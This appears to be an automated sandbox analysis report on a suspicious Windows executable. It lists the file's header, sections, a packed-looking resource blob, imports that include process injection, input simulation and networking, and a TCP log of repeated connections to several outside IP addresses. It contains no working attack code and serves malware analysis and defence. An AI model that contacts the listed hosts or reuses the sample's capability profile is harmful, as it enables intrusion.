                                                                                                                        Time Stamp:0x673ECB28 [Thu Nov 21 05:54:48 2024 UTC]
                                                                                                                        TLS Callbacks:
                                                                                                                        CLR (.Net) Version:
                                                                                                                        OS Version Major:5
                                                                                                                        OS Version Minor:1
                                                                                                                        File Version Major:5
                                                                                                                        File Version Minor:1
                                                                                                                        Subsystem Version Major:5
                                                                                                                        Subsystem Version Minor:1
                                                                                                                        Import Hash:3d95adbf13bbe79dc24dccb401c12091

                                                                                                                        Entrypoint Preview

                                                                                                                        Instruction
                                                                                                                        call 00007FEC7470581Fh
                                                                                                                        jmp 00007FEC746F8834h
                                                                                                                        int3
                                                                                                                        int3
                                                                                                                        push edi
                                                                                                                        push esi
                                                                                                                        mov esi, dword ptr [esp+10h]
                                                                                                                        mov ecx, dword ptr [esp+14h]
                                                                                                                        mov edi, dword ptr [esp+0Ch]
                                                                                                                        mov eax, ecx
                                                                                                                        mov edx, ecx
                                                                                                                        add eax, esi
                                                                                                                        cmp edi, esi
                                                                                                                        jbe 00007FEC746F89BAh
                                                                                                                        cmp edi, eax
                                                                                                                        jc 00007FEC746F8D1Eh
                                                                                                                        bt dword ptr [004C0158h], 01h
                                                                                                                        jnc 00007FEC746F89B9h
                                                                                                                        rep movsb
                                                                                                                        jmp 00007FEC746F8CCCh
                                                                                                                        cmp ecx, 00000080h
                                                                                                                        jc 00007FEC746F8B84h
                                                                                                                        mov eax, edi
                                                                                                                        xor eax, esi
                                                                                                                        test eax, 0000000Fh
                                                                                                                        jne 00007FEC746F89C0h
                                                                                                                        bt dword ptr [004BA370h], 01h
                                                                                                                        jc 00007FEC746F8E90h
                                                                                                                        bt dword ptr [004C0158h], 00000000h
                                                                                                                        jnc 00007FEC746F8B5Dh
                                                                                                                        test edi, 00000003h
                                                                                                                        jne 00007FEC746F8B6Eh
                                                                                                                        test esi, 00000003h
                                                                                                                        jne 00007FEC746F8B4Dh
                                                                                                                        bt edi, 02h
                                                                                                                        jnc 00007FEC746F89BFh
                                                                                                                        mov eax, dword ptr [esi]
                                                                                                                        sub ecx, 04h
                                                                                                                        lea esi, dword ptr [esi+04h]
                                                                                                                        mov dword ptr [edi], eax
                                                                                                                        lea edi, dword ptr [edi+04h]
                                                                                                                        bt edi, 03h
                                                                                                                        jnc 00007FEC746F89C3h
                                                                                                                        movq xmm1, qword ptr [esi]
                                                                                                                        sub ecx, 08h
                                                                                                                        lea esi, dword ptr [esi+08h]
                                                                                                                        movq qword ptr [edi], xmm1
                                                                                                                        lea edi, dword ptr [edi+08h]
                                                                                                                        test esi, 00000007h
                                                                                                                        je 00007FEC746F8A15h
                                                                                                                        bt esi, 03h
                                                                                                                        jnc 00007FEC746F8A68h
                                                                                                                        movdqa xmm1, dqword ptr [esi+00h]

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [ C ] VS2008 SP1 build 30729
                                                                                                                        • [IMP] VS2008 SP1 build 30729
                                                                                                                        • [ASM] VS2012 UPD4 build 61030
                                                                                                                        • [RES] VS2012 UPD4 build 61030
                                                                                                                        • [LNK] VS2012 UPD4 build 61030

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0xb70040x17c.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xc40000x5f3c4.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x1240000x6c4c.reloc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x8d8d00x1c.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb27300x40.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x8d0000x860.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x8b54f0x8b600f437a6545e938612764dbb0a314376fcFalse0.5699499019058296data6.680413749210956IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x8d0000x2cc420x2ce00827ffd24759e8e420890ecf164be989eFalse0.330464397632312data5.770192333189168IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0xba0000x9d540x6200e0a519f8e3a35fae0d9c2cfd5a4bacfcFalse0.16402264030612246data2.002691099965349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                        .rsrc0xc40000x5f3c40x5f400fe3c270a8920a26dfe5ecc9a2167ae68False0.9315791092519685data7.901156727761588IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .reloc0x1240000xa4740xa6000c402851fae387bd974e925866f62ef9False0.5018119352409639data5.245632821966595IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                        RT_ICON0xc45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                        RT_ICON0xc46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                        RT_ICON0xc47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                        RT_ICON0xc49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                                                                                        RT_ICON0xc4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                                                                                        RT_ICON0xc4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                                                                                        RT_ICON0xc5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                                                                                        RT_ICON0xc64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                                                                                        RT_ICON0xc69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                                                                                        RT_ICON0xc8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                                                                                        RT_ICON0xca0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                                                                                        RT_MENU0xca4a00x50dataEnglishGreat Britain0.9
                                                                                                                        RT_STRING0xca4f00x594dataEnglishGreat Britain0.3333333333333333
                                                                                                                        RT_STRING0xcaa840x68adataEnglishGreat Britain0.2747909199522103
                                                                                                                        RT_STRING0xcb1100x490dataEnglishGreat Britain0.3715753424657534
                                                                                                                        RT_STRING0xcb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                                                                                        RT_STRING0xcbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                                                                                        RT_STRING0xcc1f80x466dataEnglishGreat Britain0.3605683836589698
                                                                                                                        RT_STRING0xcc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                                                                                        RT_RCDATA0xcc7b80x566c9data1.0003276900955669
                                                                                                                        RT_GROUP_ICON0x122e840x76dataEnglishGreat Britain0.6610169491525424
                                                                                                                        RT_GROUP_ICON0x122efc0x14dataEnglishGreat Britain1.25
                                                                                                                        RT_GROUP_ICON0x122f100x14dataEnglishGreat Britain1.15
                                                                                                                        RT_GROUP_ICON0x122f240x14dataEnglishGreat Britain1.25
                                                                                                                        RT_VERSION0x122f380xdcdataEnglishGreat Britain0.6181818181818182
                                                                                                                        RT_MANIFEST0x1230140x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        WSOCK32.dll__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
                                                                                                                        VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                                                                                                                        WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                                                                                        COMCTL32.dllImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
                                                                                                                        MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                                                                                        WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
                                                                                                                        PSAPI.DLLGetProcessMemoryInfo
                                                                                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                                                                        USERENV.dllUnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
                                                                                                                        UxTheme.dllIsThemeActive
                                                                                                                        KERNEL32.dllHeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
                                                                                                                        USER32.dllSetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
                                                                                                                        GDI32.dllSetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
                                                                                                                        COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                        ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                                                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                                                                                        OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishGreat Britain

                                                                                                                        Network Behavior

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Nov 21, 2024 16:20:34.216191053 CET4976980192.168.2.9103.21.221.87
                                                                                                                        Nov 21, 2024 16:20:34.335877895 CET8049769103.21.221.87192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:34.336016893 CET4976980192.168.2.9103.21.221.87
                                                                                                                        Nov 21, 2024 16:20:34.346169949 CET4976980192.168.2.9103.21.221.87
                                                                                                                        Nov 21, 2024 16:20:34.465677977 CET8049769103.21.221.87192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:36.007711887 CET8049769103.21.221.87192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:36.007878065 CET8049769103.21.221.87192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:36.007952929 CET4976980192.168.2.9103.21.221.87
                                                                                                                        Nov 21, 2024 16:20:36.011553049 CET4976980192.168.2.9103.21.221.87
                                                                                                                        Nov 21, 2024 16:20:36.131258011 CET8049769103.21.221.87192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:51.858201981 CET4980880192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:51.978074074 CET804980838.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:51.978188992 CET4980880192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:51.994584084 CET4980880192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:52.115252972 CET804980838.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:53.500005007 CET4980880192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:53.549953938 CET804980838.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:53.550031900 CET804980838.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:53.550098896 CET4980880192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:53.550133944 CET4980880192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:53.619693041 CET804980838.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:53.620898962 CET4980880192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:54.520891905 CET4981480192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:54.640841007 CET804981438.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:54.641066074 CET4981480192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:54.657236099 CET4981480192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:54.779587030 CET804981438.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:56.171855927 CET4981480192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:56.192559958 CET804981438.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:56.192679882 CET4981480192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:56.192748070 CET804981438.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:56.192799091 CET4981480192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:56.291560888 CET804981438.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:56.291630030 CET4981480192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:57.191112995 CET4982380192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:57.311245918 CET804982338.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:57.311403036 CET4982380192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:57.328237057 CET4982380192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:57.447809935 CET804982338.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:57.447869062 CET804982338.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:58.843797922 CET4982380192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:58.946624041 CET804982338.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:58.946690083 CET804982338.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:58.946712017 CET4982380192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:58.946734905 CET4982380192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:58.965143919 CET804982338.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:58.965302944 CET4982380192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:59.868982077 CET4983180192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:20:59.988809109 CET804983138.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:20:59.988924026 CET4983180192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:21:00.002948046 CET4983180192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:21:00.122639894 CET804983138.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:01.633339882 CET804983138.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:01.633383989 CET804983138.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:01.633491993 CET4983180192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:21:01.636324883 CET4983180192.168.2.938.47.232.124
                                                                                                                        Nov 21, 2024 16:21:01.755857944 CET804983138.47.232.124192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:07.407327890 CET4984880192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:07.531167984 CET8049848199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:07.534820080 CET4984880192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:07.550414085 CET4984880192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:07.670238972 CET8049848199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:08.677205086 CET8049848199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:08.677227974 CET8049848199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:08.677308083 CET4984880192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:08.677318096 CET8049848199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:08.677356005 CET4984880192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:09.062527895 CET4984880192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:10.081578016 CET4985480192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:10.201462984 CET8049854199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:10.201565027 CET4985480192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:10.217715979 CET4985480192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:10.343466043 CET8049854199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:11.429151058 CET8049854199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:11.429266930 CET8049854199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:11.429363012 CET4985480192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:11.430969954 CET8049854199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:11.431025028 CET4985480192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:11.734460115 CET4985480192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:12.753314018 CET4986280192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:12.873111010 CET8049862199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:12.873200893 CET4986280192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:12.889194012 CET4986280192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:13.009732008 CET8049862199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:13.009751081 CET8049862199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:14.046539068 CET8049862199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:14.046560049 CET8049862199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:14.046792984 CET4986280192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:14.047878027 CET8049862199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:14.047936916 CET4986280192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:14.390894890 CET4986280192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:15.414606094 CET4987080192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:15.535047054 CET8049870199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:15.535120010 CET4987080192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:15.545063972 CET4987080192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:15.664766073 CET8049870199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:16.676485062 CET8049870199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:16.676573038 CET8049870199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:16.676584959 CET8049870199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:16.676697969 CET4987080192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:16.680461884 CET4987080192.168.2.9199.59.243.227
                                                                                                                        Nov 21, 2024 16:21:16.800232887 CET8049870199.59.243.227192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:22.829693079 CET4988780192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:22.949584007 CET8049887146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:22.949692011 CET4988780192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:22.965431929 CET4988780192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:23.086591959 CET8049887146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:24.472743988 CET4988780192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:24.509103060 CET8049887146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:24.509217024 CET8049887146.88.233.115192.168.2.9
                                                                                                                        Nov 21, 2024 16:21:24.512743950 CET4988780192.168.2.9146.88.233.115
                                                                                                                        Nov 21, 2024 16:21:24.512743950 CET4988780192.168.2.9146.88.233.115
